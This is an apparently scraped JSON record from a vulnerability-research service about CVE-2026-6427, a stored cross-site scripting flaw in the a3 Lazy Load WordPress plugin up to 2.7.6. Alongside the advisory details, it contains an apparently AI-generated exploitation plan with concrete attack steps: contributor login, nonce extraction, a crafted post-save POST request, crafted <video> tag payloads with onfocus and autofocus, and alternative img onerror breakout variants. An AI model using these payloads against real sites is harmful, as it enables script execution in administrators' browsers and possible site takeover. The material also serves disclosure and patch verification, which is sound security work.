[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fu9DomD7WWZxijWuqMNntkszgvUP815ZdiMvTobXsg6M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-6427","a3-lazy-load-authenticated-contributor-stored-cross-site-scripting-via-video-element","a3 Lazy Load \u003C= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Video Element","The a3 Lazy Load plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.7.6 This is due to a regex bug in the _filter_videos() method that breaks HTML attribute quoting when processing crafted \u003Cvideo> elements, combined with unescaped output in the admin\u002Fviews\u002Fform-data.php template. An authenticated attacker with Contributor-level access can insert a crafted \u003Cvideo> tag whose src attribute contains an embedded class=\" substring that tricks the plugin's class-replacement regex into consuming an attribute-value closing quote. This shifts the HTML5 parser's quote boundary, promoting attacker-controlled text from inside a quoted attribute value into standalone event-handler attributes (autofocus, onfocus). The injected script executes in the browser of any user (including administrators) who views the post.","a3-lazy-load",null,"\u003C=2.7.6","2.7.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-27 18:25:51","2026-05-28 06:45:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5246efbb-93cc-4951-900e-d13d08840f03?source=api-prod",1,[22,23,24,25],"a3-lazy-load.php","admin\u002Fadmin-ui.php","admin\u002Fless\u002Flib\u002Flessc.inc.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-6427\n\n## 1. Vulnerability Summary\nThe **a3 Lazy Load** plugin (versions \u003C= 2.7.6) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in the way the plugin processes `\u003Cvideo>` elements for lazy loading. Specifically, the `_filter_videos()` method (likely located in the frontend processing classes) uses a regular expression to inject its lazy-loading class. This regex fails to account for attribute values containing substrings that look like other attributes (e.g., a `src` URL containing `class=\"`). \n\nBy crafting a `\u003Cvideo>` tag where a `class=\"` string is embedded within a quoted `src` attribute, an attacker can trick the regex into consuming the intended closing quote of the `src` attribute. This results in a \"quote boundary shift,\" where subsequent attacker-controlled text is promoted from a string literal inside an attribute to standalone, executable HTML attributes (like `onfocus` or `autofocus`).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (Classic or Block Editor).\n*   **Action:** Saving or Updating a Post\u002FPage.\n*   **Required Authentication:** Contributor-level access or higher. Contributors can create and save posts but cannot publish them; however, the XSS is \"Stored\" and will execute when a higher-privileged user (Editor\u002FAdmin) previews or views the post.\n*   **Vulnerable Parameter:** `post_content` (via the standard WordPress post save mechanism).\n*   **Preconditions:** The plugin setting \"Video Support\" must be enabled (Default is ON). In `a3-lazy-load.php`, this is checked via `$a3_lazy_load_global_settings['a3l_apply_to_videos']`.\n\n## 3. Code Flow (Technical Trace)\n1.  **Entry Point:** When a post is rendered on the frontend or in a preview, WordPress applies the `the_content` filter.\n2.  **Hook Registration:** The plugin hooks into `the_content` (or potentially `wp_video_shortcode`) to scan for `\u003Cvideo>` tags.\n3.  **Processing Function:** The `_filter_videos()` method (inferred) is called to modify the tags.\n4.  **Vulnerable Regex Logic:** \n    *   The plugin searches for `\u003Cvideo>` tags and their attributes.\n    *   It attempts to locate the `class` attribute to append the `a3-lazy-load` class.\n    *   If a `class` attribute is missing, it may attempt to inject one.\n5.  **The Sink:** The regex improperly identifies the boundaries of the `src` attribute because it matches the `class=\"` string inside the URL. \n    *   *Input:* `\u003Cvideo src='video.mp4?dummy=class=\"' onfocus='alert(1)' autofocus='>`\n    *   *Faulty Transformation:* The regex identifies `class=\"` and attempts to \"fix\" or append to it, misinterpreting the single quote at the end of the `autofocus` as the closing quote of the `src`.\n6.  **Output:** The malformed HTML is rendered in the browser. The browser's HTML5 parser interprets the injected event handlers as active attributes.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via the standard WordPress Post Editor, which uses core WordPress nonces rather than plugin-specific ones.\n\n1.  **Access Editor:** The agent must authenticate as a Contributor and navigate to the \"Add New Post\" page (`\u002Fwp-admin\u002Fpost-new.php`).\n2.  **Extract Core Nonce:** The `_wpnonce` required for saving the post is embedded in the page.\n    *   `browser_navigate(\"\u002Fwp-admin\u002Fpost-new.php\")`\n    *   `_wpnonce = browser_eval(\"document.querySelector('#_wpnonce').value\")`\n3.  **Localization Data:** While not strictly necessary for the XSS itself, plugin-specific nonces are often found in the `a3_lazy_load_params` object if localized.\n    *   `browser_eval(\"window.a3_lazy_load_params?.nonce\")` (inferred key).\n\n## 5. Exploitation Strategy\nThe goal is to save a post containing the crafted `\u003Cvideo>` tag.\n\n### Step 1: Authentication\nLogin as a Contributor user.\n\n### Step 2: Payload Injection\nSend an HTTP POST request to save a new post with the XSS payload.\n\n*   **Tool:** `http_request`\n*   **URL:** `https:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `[NEW_POST_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_title`: `XSS Test`\n    *   `content`: `\u003Cvideo src='https:\u002F\u002Fexample.com\u002Fvideo.mp4?x=class=\"' onfocus='alert(1)' autofocus='>`\n    *   `post_status`: `draft`\n\n### Step 3: Triggering the XSS\nNavigate to the post preview or view the post as an Administrator.\n\n*   **URL:** `https:\u002F\u002F[target]\u002F?p=[POST_ID]&preview=true`\n*   **Action:** The `autofocus` attribute forces the `onfocus` event to fire immediately upon page load, executing `alert(1)`.\n\n## 6. Test Data Setup\n1.  **Plugin Configuration:** Ensure \"Video Support\" is enabled in the a3 Lazy Load settings (usually found at `\u002Fwp-admin\u002Fadmin.php?page=a3-lazy-load`).\n2.  **User Creation:** Create a user with the `contributor` role.\n3.  **Target Page:** Identify a post ID or create a blank draft first to obtain a `post_ID` for the `editpost` action.\n\n## 7. Expected Results\n*   The plugin's regex engine should mangle the `\u003Cvideo>` tag.\n*   Upon viewing the page source, the `onfocus` attribute should appear as a standalone attribute outside of the `src` string.\n*   A JavaScript alert box with the value `1` (or a more complex payload) should appear in the browser context of any user viewing the post.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the content is stored:\n    *   `wp post get [POST_ID] --field=post_content`\n2.  **Frontend Inspection:** Use the `http_request` tool to fetch the post frontend and check for the \"broken\" tag:\n    *   `http_request(\"GET\", \"https:\u002F\u002F[target]\u002F?p=[POST_ID]\")`\n    *   Search response body for: `onfocus=\"alert(1)\"`\n\n## 9. Alternative Approaches\nIf the simple `alert(1)` is blocked or the regex behavior differs slightly:\n*   **Double Quote Variant:** Try swapping single and double quotes: `\u003Cvideo src=\"video.mp4?class='\" onfocus=\"alert(1)\" autofocus=\">`\n*   **Attribute Breakout:** If the plugin adds its own attributes, try using `\u002F` to close the tag prematurely and start a new one: `\u003Cvideo src='v.mp4?class=\" '>\u003Cimg src=x onerror=alert(1)>`.\n*   **Admin View:** Check if `admin\u002Fviews\u002Fform-data.php` renders this content. If so, navigating to the plugin's \"Settings\" or \"Status\" page in the admin dashboard may also trigger the XSS.","gemini-3-flash-preview","2026-06-04 16:51:56","2026-06-04 16:53:06",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.7.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fa3-lazy-load\u002Ftags\u002F2.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fa3-lazy-load.2.7.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fa3-lazy-load\u002Ftags\u002F2.7.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fa3-lazy-load.2.7.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fa3-lazy-load\u002Ftags"]